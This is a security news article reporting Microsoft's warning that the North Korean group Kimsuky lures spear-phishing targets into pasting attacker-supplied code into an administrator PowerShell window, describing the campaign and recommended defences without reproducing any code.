North Korean hackers have joined the cyberattack bandwagon, asking users to copy and paste malicious code into PowerShell.
Mastered by fake CAPTCHA’s, the self-infecting attack vector is now being abused by Kimsuky, the North Korean state-sponsored threat actor, also known as Emerald Sleet and Velvet Chollima.
Microsoft Threat Intelligence warns that Kimsuky is masquerading as South Korean officials, gradually gaining the target’s trust and then sending spear-phishing emails with PDF attachments.
The PDFs themselves cannot infect the systems, however. The hackers rely on users to follow written instructions.
To read the PDF file, victims are lured into clicking a link with instructions. Hackers ask “to register your device” by following three steps: launching Powershell as administrator, pasting the provided code, and pressing “Enter.”
Microsoft Threat Intelligence has observed North Korean state actor Emerald Sleet (also known as Kimsuky and VELVET CHOLLIMA) using a new tactic: tricking targets into running PowerShell as an administrator and then pasting and running code provided by the threat actor. pic.twitter.com/PTcxwhBhGn
undefined Microsoft Threat Intelligence (@MsftSecIntel) February 11, 2025
This way the user self-infects its system with malware.
“If the target runs the code as an administrator, the code downloads and installs a browser-based remote desktop tool, downloads a certificate file with a hardcoded PIN from a remote server,” researchers at Microsoft explain.
“The code then sends a web request to a remote server to register the victim's device using the downloaded certificate and PIN. This allows the threat actor to access the device and carry out data exfiltration.”
Kimsuky mainly targets people involved in international affairs, with a particular focus on Northeast Asia. Other targets include Western non-governmental organizations (NGOs), government agencies and services, and media outlets.
Microsoft warns that the shift in tactics “is indicative of a new approach to compromising their traditional espionage targets.” The company recommends using advanced anti-phishing solutions and training users about the dangers of clicking links and running malicious scripts.
Kimsuky is just one of North Korea's state threats. It has been active since 2012 and has siphoned millions of dollars to fund the regime’s military and weapon programs. The North Korean regime most likely tasked it with a global intelligence-gathering mission. To exfiltrate the desired information from victims, the hackers previously employed many common social engineering tactics, spearphishing, and watering hole attacks.
Your email address will not be published. Required fields are markedmarked